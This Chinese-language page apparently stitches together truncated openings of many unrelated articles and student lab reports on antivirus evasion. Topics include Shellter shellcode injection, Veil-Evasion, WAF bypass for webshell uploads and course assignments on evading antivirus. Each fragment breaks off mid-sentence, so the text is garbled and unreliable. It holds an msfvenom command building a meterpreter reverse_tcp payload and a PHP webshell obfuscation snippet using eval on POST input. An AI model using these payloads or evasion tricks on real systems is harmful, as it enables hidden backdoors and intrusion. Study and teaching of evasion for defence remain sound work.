文中提及的部分技术可能带有一定攻击性,仅供安全学习和教学用途,禁止非法使用 Shellter 是一款动态 shellcode 注入工具.利用它,我们可以将shell注入到其他的可执行程序上,从而躲避安全工具的检查.下面我们来看看,如何使用该工具. 首先我们先来进行安装: apt-get install shellter 安装过程非常简单,在正式使用前我们先拷贝一个二进制文件到根目录,以方便我们后续进行注入使用: cp /usr/share/windows-binaries/plink.exe .

Shellter 是一款动态 shellcode 注入工具,我们可以将shellcode注入到其它程序上,从而来躲避杀毒软件的查杀.俗称为免杀 官网:https://www.shellterproject.com/  目前最新版本是7.2,主程序是.exe文件所以在windows下可以直接使用,在linux上运行的话 就需要安装wine环境来运行.我使用的Kali Linux 版本是kali-linux-2020.2目前最新版本  注意的是shellter目前只能注入32位的可执行文件 开始安装

工具免杀 选择了几个简单或者近期还有更新的免杀工具进行学习 ShellcodeWrapper https://github.com/Arno0x/ShellcodeWrapper 该工具的原理是使用异或加密或者aes加密,做到混淆,进行免杀. 先使用msfvenom生成raw格式文件 msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.2.1 LPORT=4444 -f raw -o shellcode.raw

首发先知: https://xz.aliyun.com/t/7170 自己还是想把一些shellcode免杀的技巧通过白话文.傻瓜式的文章把技巧讲清楚.希望更多和我一样web狗也能动手做到免杀的实现. 文中我将shellcode免杀技巧分为  "分离"."混淆"两个大类,通过不同技巧针对不同检测方式,也就是常听到的特征检测.行为检测.云查杀. 个人能力有限,文中出现错误还请斧正.轻喷. 0x01 那些shellcode"分离"免杀 首先来看看关于

本文由“即刻安全”投稿到“玄魂工作室” Veil-Evasion 是 Veil-Framework 框架的一部分,也是其主要的项目.利用它我们可以生成绕过杀软的 payload !kali 上并未安装,下面我们来进行简单的安装.我们直接从 github 上进行 clone 下载: git clone https://www.github.com/Veil-Framework/Veil-Evasion.git 图1 下载完成后,我们还需要对其软件配置包进行安装,依次输入如下命令: ls cd Ve

原文转载于:http://www.legendsec.org/1701.html 觉得写得还算蛮科普的. 00x1.关键字拆分.         比如assert,可以写成 ‘a’.’ss’.’e’.’r’.’t’这样.         总结:这种方法虽然简单,但是却没有太强的免杀功效,需要结合其他方法. 00x2.可变变量.引用.可变函数. 可变变量  比如$a=$_POST[‘x’];$b=’a’;@eval($$b);        测试结果:        总结:这种方法对狗等WAF可以

Atitit.木马病毒的免杀原理---sikuli 的使用 1. 使用sikuli java api1 1.1. 3. Write code!1 2. 常用api2 2.1. wait 等待某个界面出现2 2.2. exist/find 判断是否界面存在2 2.3. 2 2.4. 2 2.5. sikuli 如何 清空文本框中的内容??解决方法!2 2.6. 判读控件,界面是否出现??find3 3. sikuli的扩展用途4 4. atitit.sikuli  NoClassDefFoundE

Atitit.木马 病毒 免杀 技术 360免杀 杀毒软件免杀 原理与原则 attilax 总结 1. ,免杀技术的用途2 1.1. 病毒木马的编写2 1.2. 软件保护所用的加密产品(比如壳)中,有一些会被杀毒软件误认为是木马或病毒:2 1.3. 一些安全领域中使用的部分安全检测产品,也会被杀毒软件误杀.2 1.4. 远程监控技术一样.2 2. 1.3 免杀的发展史2 3. 免杀技术的简单原理2 3.1. 现在的免杀主要分为3种,其中的一种便是行为免杀,也就是通过控制病毒木马的行为来达到躲过杀

以下只是简单的思路和定位.也许有人秒过,但是不要笑话我写的笨方法.定位永远是过期不了的. 其实这里废话一下 , 本人并不是大牛 ,今天跟大家分享下 .所以写出这篇文章.(大牛飘过) 只是个人实战的经验而已 ,没有任何技术含量.ok  我们开始 我们只谈vc++源码免杀 ,过掉 国内的杀毒软件 . 达到不损坏功能 正常上线 从而无视杀软的存在 首先说中国国内杀毒软件的特征 . 1  金山毒霸 ,我个人觉得杀的代码部分和字符串还是比较普遍的 .输入表函数 我个人不多见 . 2  瑞星 ,经实战经验

之前和Random大神讨论了一下免杀的问题,他给出了一个比较不错的想法,使用debug版本发布可以过很多杀软.顺便看了下lcx的源码,发现其代码不算特别复杂,于是乎就在这分析一下. 报毒情况 因为使用的源代码编译,报毒不算很多,因为lcx使用的都是socket运行时不会被杀掉.基本上不报毒就是可以用了 使用debug方式发布的报毒 使用release方式发布的报毒情况,的确是多了那么几个但是没有想象中多的那么多 源代码 大体看了一下,其实就是很简单的运用了socket,三个核心函数bind2bi

这篇文章我介绍一下我所知道的绕过网站安全狗上传WebShell的方法. 思路是:修改HTTP请求,构成畸形HTTP请求,然后绕过网站安全狗的检测. 废话不多说,切入正题.... 1.实验环境: Windows Server 2003. Apache/2.4.18.PHP/5.3.29.网站安全狗(Apache版)V3.5.12048 2.用于文件上传的PHP源码: <?php $path = dirname(__FILE__) . '/upload/'; $rand = rand(0,30);

1.实验要求   1.1 正确使用msf编码器(0.5分),msfvenom生成如jar之类的其他文件(0.5分),veil-evasion(0.5分),加壳工具(0.5分),使用shellcode编程(1分)   1.2 通过组合应用各种技术实现恶意代码免杀(0.5分) (如果成功实现了免杀的,简单语言描述原理,不要截图.与杀软共生的结果验证要截图.)   1.3 用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本(加分0.5) 2.实验过程 2.1正确使用msf编

目录 -- 免杀原理与实践 免杀原理与实践 本次实验任务 基础知识问答 免杀扫描引擎 实验内容 正确使用msf编码器,msfvenom生成jar等文件,veil-evasion,加壳工具,使用shellcode编程 正确使用msf编码器,生成exe文件,进行免杀检测 使用msfvenom生成jar.php等文件,进行免杀检测 使用veil-evasion生成后门程序及检测 使用shellcode编程生成可执行文件并且进行免杀检测 使用加壳工具生成可执行文件并且进行免杀检测 通过组合应用各种技术实

一.实验过程 1.编码器 (1)使用msf编码器,直接生成meterpreter可执行文件(跟Exp2中生成backdoor.exe的过程一样,生成后门文件),送到Virscan.VirusTotal网站上检测(注:VirusTotal网站实在太慢,后续均使用Virscan网站检测) 很明显,直接挂掉,毕竟直接由著名的msf生成(深信服没发现???百度那个,习惯就好) (2)Msfvenom使用编码器 查询一下,-e后接所使用编码,-i后接对载荷的编码次数 msfvenom -p windows

2018-2019-2 网络对抗技术 20165232 Exp3 免杀原理与实践 免杀原理及基础问题回答 一.免杀原理 一般是对恶意软件做处理,让它不被杀毒软件所检测.也是渗透测试中需要使用到的技术. 要做好免杀,就时清楚杀毒软件(恶意软件检测工具)是如何工作的.AV(Anti-virus)是很大一个产业.其中主要的技术人员基本有编制恶意软件的经验. 反过来也一样,了解了免杀的工具和技术,你也就具有了反制它的基础. 二.基础问题回答 问:杀软是如何检测出恶意代码的? 基于特征码的检测:恶意代码有

一.实践内容 1.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具,使用shellcode编程 2.通过组合应用各种技术实现恶意代码免杀(0.5分) (如果成功实现了免杀的,简单语言描述原理,不要截图.与杀软共生的结果验证要截图.) 3.用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本(加分0.5) 二.基础问题回答 (1)杀软是如何检测出恶意代码的? 答: ①基于特征码检测:如果一个可执行文件包含一段特征码则被认

免杀原理及基础问题回答 实验内容 任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧 使用msf编码器生成各种后门程序及检测 使用veil-evasion生成后门程序及检测 半手工注入Shellcode并执行 任务二:通过组合应用各种技术实现恶意代码免杀 任务三:用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本 一.正确使用msf编码器,msfvenom生成如jar之类的

2018-2019-2 网络对抗技术 20165237 Exp3 免杀原理与实践 一.实践目标 1.1 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具,使用shellcode编程 1.2 通过组合应用各种技术实现恶意代码免杀 1.3 用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本(因为Win10的自带实时监控杀毒墙,一运行文件就自动删除,所以没有做这个加分项) 二.基础知识 免杀 一般是对恶意软件做处理,让它不

实验三 免杀原理与实践 实验内容 1.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧:(1.5分) 2.通过组合应用各种技术实现恶意代码免杀(1分)(如果成功实现了免杀的,简单语言描述原理,不要截图.与杀软共生的结果验证要截图.) 3.用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本(1分) 相关知识 免杀 一般是对恶意软件做处理,让它不被杀毒软件所检测.也是渗透测试中需要使

基础问题回答 (1)杀软是如何检测出恶意代码的? 基于特征码的检测:特征码就是一段数据.如果一个可执行文件(或其他运行的库.脚本等)包含特定的数据则被认为是恶意代码.AV软件厂商要做的就是尽量搜集最全的.最新的特征码库. 启发式恶意软件检测:根据些片面特征去推断:通过检测程序的行为是否属于恶意代码的行为来检测. (2)免杀是做什么? 想方设法让自己的后门程序避免被杀毒软件检测到,实现此程序的功能 (3)免杀的基本方法有哪些? 改变特征码:加壳,shellcode等手段 改变行为:反弹连接,隧道传

2018-2019-2 网络对抗技术 20165221 Exp3 免杀原理与实践 基础问题回答 杀软是如何检测出恶意代码的? 主要依托三种恶意软件检测机制. 基于特征码的检测:一段特征码就是一段或者多段数据.如果一个可执行文件中含有这样的数据,即可被认为是恶意代码. 启发式恶意软件检测:根据一些片面特征去推测判断,但是一般缺乏精确地判定依据. 基于行为的恶意代码检测:属于启发式的一种,或者是加入了行为监控的启发式. 免杀是做什么的? 使用一些技术手段对恶意软件做处理,让它不被杀毒软件所检测.同时